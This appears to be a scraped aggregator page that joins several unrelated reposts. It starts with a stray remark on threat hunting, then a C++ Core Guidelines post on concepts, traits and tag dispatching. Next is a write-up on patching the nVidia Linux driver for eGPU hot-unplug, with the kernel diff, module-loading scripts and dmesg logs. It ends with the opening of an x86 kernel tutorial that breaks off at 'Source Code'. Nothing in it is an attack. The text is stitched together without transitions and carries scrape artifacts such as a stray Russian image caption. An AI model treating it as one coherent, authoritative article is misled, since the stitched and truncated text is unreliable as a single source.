It’s much better to invest in a highly technical Threat Hunter for detecting suspicious behaviors in your environment’s and logs rather than buying a high-end Sandbox or Antivirus Solution, though the latter is also useful in it’s own sense too.

 

C++ Core Guidelines: Definition of Concepts, the Second

fern 821293 1280

Let’s assume; I defined the is_contiguous trait. In this case, I can use it to distinguish a random access iterator RA_iter from a contiguous iterator Contiguous_iter.

template<typename I>    // iterator providing random access
concept bool RA_iter = ...;

template<typename I>    // iterator providing random access to contiguous data
concept bool Contiguous_iter =
    RA_iter<I> && is_contiguous<I>::value;  // using is_contiguous trait

 

I can even wrap a tag class such as is_contiguous into a concept an use it. Now, I have a more straightforward expression of my idea contiguous iterator Contiguous_iter.

template<typename I> concept Contiguous = is_contiguous<I>::value;

template<typename I>
concept bool Contiguous_iter = RA_iter<I> && Contiguous<I>;

 

Okay, let me first explain two key terms: traits and tag dispatching.

Traits

Traits are class templates which extract properties from a generic type.

The following program presents for each of the 14 primary type categories of the type-traits library a type which satisfies the specific trait. The primary type categories are complete and don’t overlap. So each type is a member of a type category. If you check a type category for your type, the request is independent of the const or volatile qualifiers.

// traitsPrimary.cpp

#include <iostream>
#include <type_traits>

using namespace std;

template <typename T>
void getPrimaryTypeCategory(){

  cout << boolalpha << endl;

  cout << "is_void<T>::value: " << is_void<T>::value << endl;
  cout << "is_integral<T>::value: " << is_integral<T>::value << endl;
  cout << "is_floating_point<T>::value: " << is_floating_point<T>::value << endl;
  cout << "is_array<T>::value: " << is_array<T>::value << endl;
  cout << "is_pointer<T>::value: " << is_pointer<T>::value << endl;
  cout << "is_reference<T>::value: " << is_reference<T>::value << endl;
  cout << "is_member_object_pointer<T>::value: " << is_member_object_pointer<T>::value << endl;
  cout << "is_member_function_pointer<T>::value: " << is_member_function_pointer<T>::value << endl;
  cout << "is_enum<T>::value: " << is_enum<T>::value << endl;
  cout << "is_union<T>::value: " << is_union<T>::value << endl;
  cout << "is_class<T>::value: " << is_class<T>::value << endl;
  cout << "is_function<T>::value: " << is_function<T>::value << endl;
  cout << "is_lvalue_reference<T>::value: " << is_lvalue_reference<T>::value << endl;
  cout << "is_rvalue_reference<T>::value: " << is_rvalue_reference<T>::value << endl;

  cout << endl;

}

int main(){
    
    getPrimaryTypeCategory<void>();              // (1)
    getPrimaryTypeCategory<short>();             // (1)
    getPrimaryTypeCategory<double>();
    getPrimaryTypeCategory<int []>();
    getPrimaryTypeCategory<int*>();
    getPrimaryTypeCategory<int&>();
    struct A{
        int a;
        int f(double){return 2011;}
    };
    getPrimaryTypeCategory<int A::*>();
    getPrimaryTypeCategory<int (A::*)(double)>();
    enum E{
        e= 1,
    };
    getPrimaryTypeCategory<E>();
    union U{
      int u;
    };
    getPrimaryTypeCategory<U>();
    getPrimaryTypeCategory<string>();
    getPrimaryTypeCategory<int * (double)>();
    getPrimaryTypeCategory<int&>();              // (2)         
    getPrimaryTypeCategory<int&&>();             // (2)
    
}

 

I don’t want to bore you to death. Therefore, there is only the output of the lines (1).

traitsPrimary1

And here is the output of the lines (2).

traitsPrimary2

Tag Dispatching

Tag dispatching enables it to choose a function based on the properties of its types. The decision takes place at compile time and traits which I explained the last paragraph are used.

A typical example of tag dispatching is the std::advance algorithm from the Standard Template Library. std::advance(it, n)increments the iterator it by n elements. The program shows you the key idea.

 

// advanceTagDispatch.cpp

#include <iterator>
#include <forward_list>
#include <list>
#include <vector>
#include <iostream>

template <typename InputIterator, typename Distance>
void advance_impl(InputIterator& i, Distance n, std::input_iterator_tag) {
	std::cout << "InputIterator used" << std::endl; 
    while (n--) ++i;
}

template <typename BidirectionalIterator, typename Distance>
void advance_impl(BidirectionalIterator& i, Distance n, std::bidirectional_iterator_tag) {
	std::cout << "BidirectionalIterator used" << std::endl;
    if (n >= 0) 
        while (n--) ++i;
    else 
        while (n++) --i;
}

template <typename RandomAccessIterator, typename Distance>
void advance_impl(RandomAccessIterator& i, Distance n, std::random_access_iterator_tag) {
	std::cout << "RandomAccessIterator used" << std::endl;
    i += n;
}

template <typename InputIterator, typename Distance>
void advance_(InputIterator& i, Distance n) {
    typename std::iterator_traits<InputIterator>::iterator_category category;    // (1)
    advance_impl(i, n, category);                                                // (2)
}
  
int main(){
    
    std::cout << std::endl;
    
    std::vector<int> myVec{0, 1, 2, 3, 4, 5, 6, 7, 8, 9};
    auto myVecIt = myVec.begin();                                                // (3)
    std::cout << "*myVecIt: " << *myVecIt << std::endl;
    advance_(myVecIt, 5);
    std::cout << "*myVecIt: " << *myVecIt << std::endl;
    
    std::cout << std::endl;
    
    std::list<int> myList{0, 1, 2, 3, 4, 5, 6, 7, 8, 9};
    auto myListIt = myList.begin();                                              // (4)
    std::cout << "*myListIt: " << *myListIt << std::endl;
    advance_(myListIt, 5);
    std::cout << "*myListIt: " << *myListIt << std::endl;
    
    std::cout << std::endl;
    
    std::forward_list<int> myForwardList{0, 1, 2, 3, 4, 5, 6, 7, 8, 9};
    auto myForwardListIt = myForwardList.begin();                                // (5)
    std::cout << "*myForwardListIt: " << *myForwardListIt << std::endl;
    advance_(myForwardListIt, 5);
    std::cout << "*myForwardListIt: " << *myForwardListIt << std::endl;
    
    std::cout << std::endl;
    
}

 

The expression std::iterator_traits::iterator_category category determines the iterator category at compile time. Based on the iterator category the most specific variable of the function advance_impl(i, n, category) is used in line (2). Each container returns an iterator of the iterator category which corresponds to its structure. Therefore, line (3) gives a random access iterator, line (4) gives a bidirectional iterator, and line (5) gives a forward iterator which is also an input iterator.

advanceTagDispatchFrom the performance point of view, this distinction makes a lot of sense because a random access iterator can be faster incremented than a bidirectional iterator, and a bidirectional iterator can be faster incremented than an input iterator. From the users perspective, you invokestd::advance(it, 5) and you get the fastest version which your container satisfies.

This was quite verbose. I have not so much to add the two remaining rules.

T.25: Avoid complimentary constraints

The example from the guidelines shows complimentary constraints.

template<typename T> 
    requires !C<T> // bad 
void f(); 

template<typename T> 
    requires C<T> 
void f();

Avoid it. Make an unconstrained template and a constrained template instead.

 

template<typename T>   // general template
    void f();

template<typename T>   // specialization by concept
    requires C<T>
void f();

 

You can even set the unconstrained version to delete such that the constrained versions is only usable.

template<typename T>
void f() = delete;

 

T.26: Prefer to define concepts in terms of use-patterns rather than simple syntax

The title for this guideline is quite vague, but the example is self-explanatory.

Instead of using the concepts has_equal and has_not_equal to define the concept Equality

template<typename T> concept Equality = has_equal<T> && has_not_equal<T>;

 

use the usage-pattern. This is more readable than the previous version:

template<typename T> concept Equality = requires(T a, T b) {
    bool == { a == b }
    bool == { a != b }
    // axiom { !(a == b) == (a != b) }
    // axiom { a = b; => a == b }  // => means "implies"
}

 

The concept Equality requires in this case that you can apply == and != to the arguments and both operations return bool.

What’s next?

Here is a part of the opening from the C++ core guidelines to template interfaces: «…the interface to a template is a critical concept — a contract between a user and an implementer — and should be carefully designed.». You see, the next post is critical.

 

 

Thanks a lot to my Patreon Supporters: Eric Pederson, Paul Baxter,  Meeting C++, Matt Braun, Avi Lachmish, Roman Postanciuc, Venkata Ramesh Gudpati, Tobias Zindl, Mielo, Dilettant, and Marko.

Thanks in particular to:  TakeUpCode 450 60

Patching nVidia GPU driver for hot-unplug on Linux

( original text by @whitequark )

Recently, I’ve using an extremely cursed setup where my XPS 13 9360 laptop is connected to a Sonnet EchoExpress 2 box rewired for Thunderbolt 3 that has an nVidia Quadro 600 GPU, and Linux is set up for render offload to the eGPU and then frame transfer back to iGPU to be displayed on the laptop’s integrated display, which (to my sheer surprise) not only works quire reliably, but even gives me higher FPS in Team Fortress 2 than the iGPU.Картинки по запросу nvidiaThere’s only really one downside: if the eGPU falls off the bus, either because someone™ pulled out the cable, or because the stars didn’t align quite right this morning and it decided to enumerate seemingly at random (sometimes this is preceeded by whining from PCIe AER, sometimes not, I think it’s some sort of hardware issue like a badly inserted PCIe card, but I’m not entirely sure), the nVidia driver… hangs. Hangs quite deliberately, as the sources to the kernel driver show. This leaves the Xorg instance bound to the eGPU hung forever (which confuses bumblebee, but is otherwise not especially bad), and also prevents any new ones from using the eGPU (which is bad).

Anyway, I was kind of annoyed of rebooting every time it happens, so I decided to reboot a few more dozen times instead while patching the driver. This has indeed worked, and left me with something similar to a functional hot-unplug, mildly crippled by the fact that nvidia-modeset is a completely opaque blob that keeps some internal state and tries to act on it, getting stuck when it tries to do something to the now-missing eGPU.

Turns out, there are only a few issues preventing functional hot-unplug.

  1. In nvidia_remove, the driver actually checks if anyone’s still trying to use it, and if yes, it tries to just hang the removal process. This doesn’t actually work, or rather, it mostly works by accident. It starts an infinite loop calling os_schedule() while having taken the NV_LINUX_DEVICES lock. While in the default configuration this indeed hangs any reentrant requests into the driver by virtue of NV_CHECK_PCI_CONFIG_SPACE taking the same lock (in verify_pci_bars, passing the NVreg_CheckPCIConfigSpace=0 module option eliminates that accidental safety mechanism, and allows reentrant requests to proceed. They do not crash due to memory being deallocated in nvidia_remove (so you don’t get an unhandled kernel page fault), but they still crash due to being unable to access the GPU.
  2. The NVKMS component (in the nvidia-modeset module) tries to maintain some state, and change it when e.g. the Xorg instance quits and closes the /dev/nvidia-modeset file. Unfortunately, it does not expect the GPU to go away, and first spews a few messages to dmesg similar to nvidia-modeset: ERROR: GPU:0: Failed to query display engine channel state: 0x0000857d:0:0:0x0000000f, after which it appears to hang somewhere inside the blob, which has been conveniently stripped of all symbols. This needs to be prevented, but…
  3. The NVKMS component effectively only exposes a single opaque ioctl, and all the communication, including communication of the GPU bus ID, happens out of band with regards to the open source parts of the nvidia-modesetmodule. Fortunately, NVKMS calls back into NVRM, and this allows us to associate each /dev/nvidia-modeset fd with the GPU bus ID.
  4. When unloading NVKMS, it also tries to act on its internal state and change the GPU state, which leads to the same hang.

All in all, this allows a patch to be written that detects when a GPU goes away, ignores all further NVKMS requests related to that specific GPU (and returns -ENOENT in response to ioctls, which Xorg appropriately interprets as a fault condition), correctly releases the resources by requesting NVRM, and improperly unloads NVKMS so it doesn’t try to reset the GPU state. (All actual resources should be released by this point, and NVKMS doesn’t have any resource allocation callbacks other than those we already intercept, so in theory this doesn’t have any bad consequences. But I’m not working for nVidia, so this might be completely wrong.)

After the GPU is plugged back in, NVKMS will try to act on its internal state again; in this case, it doesn’t hang, but it doesn’t initialize the GPU correctly either, so the nvidia-modeset kernel module has to be (manually) reloaded. It’s not easy to do this automatically because in a hypothetical system with more than one nVidia GPU the module would still be in use when one of them dies, and so just hard reloading NVKMS would have unfortunate consequences. (Though, I don’t really know whether NVKMS would try to access the dead GPU in response to the request acting on the other GPU anyway. I decided to do it conservatively.) Once it’s reloaded you’re back in the game though!

Here’s the patch, written against the nvidia-legacy-390xx-390.87 Debian source package:

nvidia-hot-gpu-on-gpu-unplug-action.patch (download)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
diff -ur original/common/inc/nv-linux.h patchedl/common/inc/nv-linux.h
--- original/common/inc/nv-linux.h	2018-09-23 12:20:02.000000000 +0000
+++ patched/common/inc/nv-linux.h	2018-10-28 07:19:21.526566940 +0000
@@ -1465,6 +1465,7 @@
 typedef struct nv_linux_state_s {
     nv_state_t nv_state;
     atomic_t usage_count;
+    atomic_t dead;
 
     struct pci_dev *dev;
 
diff -ur original/common/inc/nv-modeset-interface.h patched/common/inc/nv-modeset-interface.h
--- original/common/inc/nv-modeset-interface.h	2018-08-22 00:55:23.000000000 +0000
+++ patched/common/inc/nv-modeset-interface.h	2018-10-28 07:22:00.768238371 +0000
@@ -25,6 +25,8 @@
 
 #include "nv-gpu-info.h"
 
+#include <asm/atomic.h>
+
 /*
  * nvidia_modeset_rm_ops_t::op gets assigned a function pointer from
  * core RM, which uses the calling convention of arguments on the
@@ -115,6 +117,8 @@
 
     int (*set_callbacks)(const nvidia_modeset_callbacks_t *cb);
 
+    atomic_t * (*gpu_dead)(NvU32 gpu_id);
+
 } nvidia_modeset_rm_ops_t;
 
 NV_STATUS nvidia_get_rm_ops(nvidia_modeset_rm_ops_t *rm_ops);
diff -ur original/common/inc/nv-proto.h patched/common/inc/nv-proto.h
--- original/common/inc/nv-proto.h	2018-08-22 00:55:23.000000000 +0000
+++ patched/common/inc/nv-proto.h	2018-10-28 07:20:49.939494812 +0000
@@ -81,6 +81,7 @@
 NvBool      nvidia_get_gpuid_list       (NvU32 *gpu_ids, NvU32 *gpu_count);
 int         nvidia_dev_get              (NvU32, nvidia_stack_t *);
 void        nvidia_dev_put              (NvU32, nvidia_stack_t *);
+atomic_t *  nvidia_dev_dead             (NvU32);
 int         nvidia_dev_get_uuid         (const NvU8 *, nvidia_stack_t *);
 void        nvidia_dev_put_uuid         (const NvU8 *, nvidia_stack_t *);
 int         nvidia_dev_get_pci_info     (const NvU8 *, struct pci_dev **, NvU64 *, NvU64 *);
diff -ur original/nvidia/nv.c patched/nvidia/nv.c
--- original/nvidia/nv.c	2018-09-23 12:20:02.000000000 +0000
+++ patched/nvidia/nv.c	2018-10-28 07:48:05.895025112 +0000
@@ -1944,6 +1944,12 @@
     unsigned int i;
     NvBool bRemove = NV_FALSE;
 
+    if (NV_ATOMIC_READ(nvl->dead))
+    {
+        nv_printf(NV_DBG_ERRORS, "NVRM: nvidia_close called on dead device by pid %d!\n",
+                  current->pid);
+    }
+
     NV_CHECK_PCI_CONFIG_SPACE(sp, nv, TRUE, TRUE, NV_MAY_SLEEP());
 
     /* for control device, just jump to its open routine */
@@ -2106,6 +2112,12 @@
     size_t arg_size;
     int arg_cmd;
 
+    if (NV_ATOMIC_READ(nvl->dead))
+    {
+        nv_printf(NV_DBG_ERRORS, "NVRM: nvidia_ioctl called on dead device by pid %d!\n",
+                  current->pid);
+    }
+
     nv_printf(NV_DBG_INFO, "NVRM: ioctl(0x%x, 0x%x, 0x%x)\n",
         _IOC_NR(cmd), (unsigned int) i_arg, _IOC_SIZE(cmd));
 
@@ -3217,6 +3229,7 @@
     NV_INIT_MUTEX(&nvl->ldata_lock);
 
     NV_ATOMIC_SET(nvl->usage_count, 0);
+    NV_ATOMIC_SET(nvl->dead, 0);
 
     if (!rm_init_event_locks(sp, nv))
         return NV_FALSE;
@@ -4018,14 +4031,38 @@
         nv_printf(NV_DBG_ERRORS,
                   "NVRM: Attempting to remove minor device %u with non-zero usage count!\n",
                   nvl->minor_num);
+        nv_printf(NV_DBG_ERRORS,
+                  "NVRM: YOLO, waiting for usage count to drop to zero\n");
         WARN_ON(1);
 
-        /* We can't continue without corrupting state, so just hang to give the
-         * user some chance to do something about this before reboot */
-        while (1)
+        NV_ATOMIC_SET(nvl->dead, 1);
+
+        /* Insanity check: wait until all clients die, then hope for the best. */
+        while (1) {
+            UNLOCK_NV_LINUX_DEVICES();
             os_schedule();
-    }
+            LOCK_NV_LINUX_DEVICES();
+
+            nvl = pci_get_drvdata(dev);
+            if (!nvl || (nvl->dev != dev))
+            {
+                goto done;
+            }
+
+            if (NV_ATOMIC_READ(nvl->usage_count) == 0)
+            {
+                break;
+            }
+        }
 
+        nv_printf(NV_DBG_ERRORS,
+                  "NVRM: Usage count is now zero, proceeding to remove the GPU\n");
+        nv_printf(NV_DBG_ERRORS,
+                  "NVRM: This is not actually supposed to work lol. Hope it does tho 👍\n");
+        nv_printf(NV_DBG_ERRORS,
+                  "NVRM: You probably want to reload nvidia-modeset now if you want any "
+                  "of this to ever start up again, but like, man, that's your choice entirely\n");
+    }
     nv = NV_STATE_PTR(nvl);
     if (nvl == nv_linux_devices)
         nv_linux_devices = nvl->next;
@@ -4712,6 +4749,22 @@
     up(&nvl->ldata_lock);
 }
 
+atomic_t *nvidia_dev_dead(NvU32 gpu_id)
+{
+    nv_linux_state_t *nvl;
+    atomic_t *ret;
+
+    /* Takes nvl->ldata_lock */
+    nvl = find_gpu_id(gpu_id);
+    if (!nvl)
+        return NV_FALSE;
+
+    ret = &nvl->dead;
+    up(&nvl->ldata_lock);
+
+    return ret;
+}
+
 /*
  * Like nvidia_dev_get but uses UUID instead of gpu_id. Note that this may
  * trigger initialization and teardown of unrelated devices to look up their
diff -ur original/nvidia/nv-modeset-interface.c patched/nvidia/nv-modeset-interface.c
--- original/nvidia/nv-modeset-interface.c	2018-08-22 00:55:22.000000000 +0000
+++ patched/nvidia/nv-modeset-interface.c	2018-10-28 07:20:25.959243110 +0000
@@ -114,6 +114,7 @@
         .close_gpu      = nvidia_dev_put,
         .op             = rm_kernel_rmapi_op, /* provided by nv-kernel.o */
         .set_callbacks  = nvidia_modeset_set_callbacks,
+        .gpu_dead       = nvidia_dev_dead,
     };
 
     if (strcmp(rm_ops->version_string, NV_VERSION_STRING) != 0)
diff -ur original/nvidia/nv-reg.h patched/nvidia/nv-reg.h
diff -ur original/nvidia-modeset/nvidia-modeset-linux.c patched/nvidia-modeset/nvidia-modeset-linux.c
--- original/nvidia-modeset/nvidia-modeset-linux.c	2018-09-23 12:20:02.000000000 +0000
+++ patched/nvidia-modeset/nvidia-modeset-linux.c	2018-10-28 07:47:14.738703417 +0000
@@ -75,6 +75,9 @@
 
 static struct semaphore nvkms_lock;
 
+static NvU32 clopen_gpu_id;
+static NvBool leak_on_unload;
+
 /*************************************************************************
  * NVKMS executes queued work items on a single kthread.
  *************************************************************************/
@@ -89,6 +92,9 @@
 struct nvkms_per_open {
     void *data;
 
+    NvU32 gpu_id;
+    atomic_t *gpu_dead;
+
     enum NvKmsClientType type;
 
     union {
@@ -711,6 +717,9 @@
     nvidia_modeset_stack_ptr stack = NULL;
     NvBool ret;
 
+    printk(KERN_INFO NVKMS_LOG_PREFIX "nvkms_open_gpu called with %08x, pid %d\n",
+           gpuId, current->pid);
+
     if (__rm_ops.alloc_stack(&stack) != 0) {
         return NV_FALSE;
     }
@@ -719,6 +728,10 @@
 
     __rm_ops.free_stack(stack);
 
+    if (ret) {
+        clopen_gpu_id = gpuId;
+    }
+
     return ret;
 }
 
@@ -726,12 +739,17 @@
 {
     nvidia_modeset_stack_ptr stack = NULL;
 
+    printk(KERN_INFO NVKMS_LOG_PREFIX "nvkms_close_gpu called with %08x, pid %d\n",
+           gpuId, current->pid);
+
     if (__rm_ops.alloc_stack(&stack) != 0) {
         return;
     }
 
     __rm_ops.close_gpu(gpuId, stack);
 
+    clopen_gpu_id = gpuId;
+
     __rm_ops.free_stack(stack);
 }
 
@@ -771,8 +789,14 @@
 
     popen->type = type;
 
+    printk(KERN_INFO NVKMS_LOG_PREFIX "entering nvkms_open_common, pid %d\n",
+           current->pid);
+
     *status = down_interruptible(&nvkms_lock);
 
+    printk(KERN_INFO NVKMS_LOG_PREFIX "taken lock in nvkms_open_common, pid %d\n",
+           current->pid);
+
     if (*status != 0) {
         goto failed;
     }
@@ -781,6 +805,9 @@
 
     up(&nvkms_lock);
 
+    printk(KERN_INFO NVKMS_LOG_PREFIX "given up lock in nvkms_open_common, pid %d\n",
+           current->pid);
+
     if (popen->data == NULL) {
         *status = -EPERM;
         goto failed;
@@ -799,10 +826,16 @@
 
     *status = 0;
 
+    printk(KERN_INFO NVKMS_LOG_PREFIX "exiting in nvkms_open_common, pid %d\n",
+           current->pid);
+
     return popen;
 
 failed:
 
+    printk(KERN_INFO NVKMS_LOG_PREFIX "error in nvkms_open_common, pid %d\n",
+           current->pid);
+
     nvkms_free(popen, sizeof(*popen));
 
     return NULL;
@@ -816,14 +849,36 @@
      * mutex.
      */
 
+    printk(KERN_INFO NVKMS_LOG_PREFIX "entering nvkms_close_common, pid %d\n",
+           current->pid);
+
     down(&nvkms_lock);
 
-    nvKmsClose(popen->data);
+    printk(KERN_INFO NVKMS_LOG_PREFIX "taken lock in nvkms_close_common, pid %d\n",
+           current->pid);
+
+    if (popen->gpu_id != 0 && atomic_read(popen->gpu_dead) != 0) {
+        printk(KERN_ERR NVKMS_LOG_PREFIX "awwww u need cleanup :3 "
+               "in nvkms_close_common, pid %d\n",
+               current->pid);
+
+        nvkms_close_gpu(popen->gpu_id);
+
+        popen->gpu_id = 0;
+        popen->gpu_dead = NULL;
+
+        leak_on_unload = NV_TRUE;
+    } else {
+        nvKmsClose(popen->data);
+    }
 
     popen->data = NULL;
 
     up(&nvkms_lock);
 
+    printk(KERN_INFO NVKMS_LOG_PREFIX "given up lock in nvkms_close_common, pid %d\n",
+           current->pid);
+
     if (popen->type == NVKMS_CLIENT_KERNEL_SPACE) {
         /*
          * Flush any outstanding nvkms_kapi_event_kthread_q_callback() work
@@ -844,6 +899,9 @@
     }
 
     nvkms_free(popen, sizeof(*popen));
+
+    printk(KERN_INFO NVKMS_LOG_PREFIX "exiting nvkms_close_common, pid %d\n",
+           current->pid);
 }
 
 int NVKMS_API_CALL nvkms_ioctl_common
@@ -855,20 +913,58 @@
     int status;
     NvBool ret;
 
+    printk(KERN_INFO NVKMS_LOG_PREFIX "entering nvkms_ioctl_common, pid %d\n",
+           current->pid);
+
     status = down_interruptible(&nvkms_lock);
     if (status != 0) {
         return status;
     }
 
+    printk(KERN_INFO NVKMS_LOG_PREFIX "taken lock in nvkms_ioctl_common, pid %d\n",
+           current->pid);
+
+    if (popen->gpu_id != 0 && atomic_read(popen->gpu_dead) != 0) {
+        goto dead;
+    }
+
+    clopen_gpu_id = 0;
+
     if (popen->data != NULL) {
         ret = nvKmsIoctl(popen->data, cmd, address, size);
     } else {
         ret = NV_FALSE;
     }
 
+    if (clopen_gpu_id != 0) {
+        if (!popen->gpu_id) {
+            printk(KERN_INFO NVKMS_LOG_PREFIX "detected gpu %08x open in nvkms_ioctl_common, "
+                   "pid %d\n", clopen_gpu_id, current->pid);
+            popen->gpu_id = clopen_gpu_id;
+            popen->gpu_dead = __rm_ops.gpu_dead(clopen_gpu_id);
+        } else {
+            printk(KERN_INFO NVKMS_LOG_PREFIX "detected gpu %08x close in nvkms_ioctl_common, "
+                   "pid %d\n", clopen_gpu_id, current->pid);
+            popen->gpu_id = 0;
+            popen->gpu_dead = NULL;
+        }
+    }
+
     up(&nvkms_lock);
 
+    printk(KERN_INFO NVKMS_LOG_PREFIX "given up lock in nvkms_ioctl_common, pid %d\n",
+           current->pid);
+
     return ret ? 0 : -EPERM;
+
+dead:
+    up(&nvkms_lock);
+
+    printk(KERN_ERR NVKMS_LOG_PREFIX "*notices ur gpu is dead* owo whats this "
+           "in nvkms_ioctl_common, pid %d\n",
+           current->pid);
+
+    return -ENOENT;
 }
 
 /*************************************************************************
@@ -1239,9 +1335,14 @@
 
     nvkms_proc_exit();
 
-    down(&nvkms_lock);
-    nvKmsModuleUnload();
-    up(&nvkms_lock);
+    if(leak_on_unload) {
+        printk(KERN_ERR NVKMS_LOG_PREFIX "im just gonna leak all the kms junk ok? "
+               "haha nvm wasnt a question. in nvkms_exit\n");
+    } else {
+        down(&nvkms_lock);
+        nvKmsModuleUnload();
+        up(&nvkms_lock);
+    }
 
     /*
      * At this point, any pending tasks should be marked canceled, but

Here’s some handy scripts I was using while debugging it:

insmod.sh
1
2
3
4
5
#!/bin/sh -ex
modprobe acpi_ipmi
insmod nvidia.ko NVreg_ResmanDebugLevel=-1 NVreg_CheckPCIConfigSpace=0
insmod nvidia-modeset.ko
dmesg -w
rmmod.sh
1
2
3
#!/bin/sh
rmmod nvidia-modeset
rmmod nvidia
xorg.sh
1
2
#!/bin/sh
exec Xorg :8 -config /etc/bumblebee/xorg.conf.nvidia -configdir /etc/bumblebee/xorg.conf.d -sharevts -nolisten tcp -noreset -verbose 3 -isolateDevice PCI:06:00:0 -modulepath /usr/lib/nvidia/nvidia,/usr/lib/xorg/modules

And finally, here are the relevant kernel and Xorg log messages, showing what happens when a GPU is unplugged:

dmesg.log
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
[  219.524218] NVRM: loading NVIDIA UNIX x86_64 Kernel Module  390.87  Tue Aug 21 12:33:05 PDT 2018 (using threaded interrupts)
[  219.527409] nvidia-modeset: Loading NVIDIA Kernel Mode Setting Driver for UNIX platforms  390.87  Tue Aug 21 16:16:14 PDT 2018
[  224.780721] nvidia-modeset: nvkms_open_gpu called with 00000600, pid 4560
[  224.807370] nvidia-modeset: detected gpu 00000600 open in nvkms_ioctl_common, pid 4560
[  239.061383] NVRM: GPU at PCI:0000:06:00: GPU-9fe1319c-8dd3-44e4-2b74-de93f8b02c6a
[  239.061387] NVRM: Xid (PCI:0000:06:00): 79, GPU has fallen off the bus.
[  239.061389] NVRM: GPU at 0000:06:00.0 has fallen off the bus.
[  239.061398] NVRM: A GPU crash dump has been created. If possible, please run
               NVRM: nvidia-bug-report.sh as root to collect this data before
               NVRM: the NVIDIA kernel module is unloaded.
[  240.209498] NVRM: Attempting to remove minor device 0 with non-zero usage count!
[  240.209501] NVRM: YOLO, waiting for usage count to drop to zero
[  241.433499] nvidia-modeset: *notices ur gpu is dead* owo whats this in nvkms_ioctl_common, pid 4560
[  241.433851] nvidia-modeset: awwww u need cleanup :3 in nvkms_close_common, pid 4560
[  241.433853] nvidia-modeset: nvkms_close_gpu called with 00000600, pid 4560
[  250.440498] NVRM: Usage count is now zero, proceeding to remove the GPU
[  250.440513] NVRM: This is not actually supposed to work lol. Hope it does tho 👍
[  250.440520] NVRM: You probably want to reload nvidia-modeset now if you want any of this to ever start up again, but like, man, that's your choice entirely
[  250.440870] pci 0000:06:00.1: Dropping the link to 0000:06:00.0
[  250.440950] pci_bus 0000:06: busn_res: [bus 06] is released
[  250.440982] pci_bus 0000:07: busn_res: [bus 07-38] is released
[  250.441012] pci_bus 0000:05: busn_res: [bus 05-38] is released
[  251.000794] pci_bus 0000:02: Allocating resources
[  251.001324] pci_bus 0000:02: Allocating resources
[  253.765953] pcieport 0000:00:1c.0: AER: Corrected error received: 0000:00:1c.0
[  253.765969] pcieport 0000:00:1c.0: PCIe Bus Error: severity=Corrected, type=Physical Layer, (Receiver ID)
[  253.765976] pcieport 0000:00:1c.0:   device [8086:9d10] error status/mask=00002001/00002000
[  253.765982] pcieport 0000:00:1c.0:    [ 0] Receiver Error         (First)
[  253.841064] pcieport 0000:02:02.0: Refused to change power state, currently in D3
[  253.843882] pcieport 0000:02:00.0: Refused to change power state, currently in D3
[  253.846177] pci_bus 0000:03: busn_res: [bus 03] is released
[  253.846248] pci_bus 0000:04: busn_res: [bus 04-38] is released
[  253.846300] pci_bus 0000:39: busn_res: [bus 39] is released
[  253.846348] pci_bus 0000:02: busn_res: [bus 02-39] is released
[  353.369487] nvidia-modeset: im just gonna leak all the kms junk ok? haha nvm wasnt a question. in nvkms_exit
[  357.600350] nvidia-modeset: Loading NVIDIA Kernel Mode Setting Driver for UNIX platforms  390.87  Tue Aug 21 16:16:14 PDT 2018
Xorg.8.log
1
[   244.798] (EE) NVIDIA(GPU-0): WAIT (2, 8, 0x8000, 0x000011f4, 0x00001210)

Let’s write a Kernel

origin text

Let us write a simple kernel which could be loaded with the GRUB bootloader on an x86 system. This kernel will display a message on the screen and then hang.

How does an x86 machine boot

Before we think about writing a kernel, let’s see how the machine boots up and transfers control to the kernel:

Most registers of the x86 CPU have well defined values after power-on. The Instruction Pointer (EIP) register holds the memory address for the instruction being executed by the processor. EIP is hardcoded to the value 0xFFFFFFF0. Thus, the x86 CPU is hardwired to begin execution at the physical address 0xFFFFFFF0. It is in fact, the last 16 bytes of the 32-bit address space. This memory address is called reset vector.

Now, the chipset’s memory map makes sure that 0xFFFFFFF0 is mapped to a certain part of the BIOS, not to the RAM. Meanwhile, the BIOS copies itself to the RAM for faster access. This is called shadowing. The address 0xFFFFFFF0 will contain just a jump instruction to the address in memory where BIOS has copied itself.

Thus, the BIOS code starts its execution.  BIOS first searches for a bootable device in the configured boot device order. It checks for a certain magic number to determine if the device is bootable or not. (whether bytes 511 and 512 of first sector are 0xAA55)

Once the BIOS has found a bootable device, it copies the contents of the device’s first sector into RAM starting from physical address 0x7c00; and then jumps into the address and executes the code just loaded. This code is called the bootloader.

The bootloader then loads the kernel at the physical address 0x100000. The address 0x100000 is used as the start-address for all big kernels on x86 machines.

All x86 processors begin in a simplistic 16-bit mode called real mode. The GRUB bootloader makes the switch to 32-bit protected mode by setting the lowest bit of CR0 register to 1. Thus the kernel loads in 32-bit protected mode.

Do note that in case of linux kernel, GRUB detects linux boot protocol and loads linux kernel in real mode. Linux kernel itself makes the switch to protected mode.

 

What all do we need?

* An x86 computer (of course)
* Linux
NASM assembler
* gcc
* ld (GNU Linker)
* grub

 

Source Code
